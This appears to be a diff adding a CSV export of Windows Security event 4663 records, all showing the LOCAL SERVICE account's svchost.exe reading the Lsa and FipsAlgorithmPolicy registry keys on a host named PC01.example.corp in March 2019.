+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452850
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452849
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452848
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452847
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452846
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452845
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452844
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452843
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452842
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452841
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452840
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452839
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452838
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452837
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452836
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452835
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452834
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452833
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452832
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452831
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452830
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452829
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452828
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452827
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452826
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452825
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452824
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452823
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.205246+04:00,1553038515.205246,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452822
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452821
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452820
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452819
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452818
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452817
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452816
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452815
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452814
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452813
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452922
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452921
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452920
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
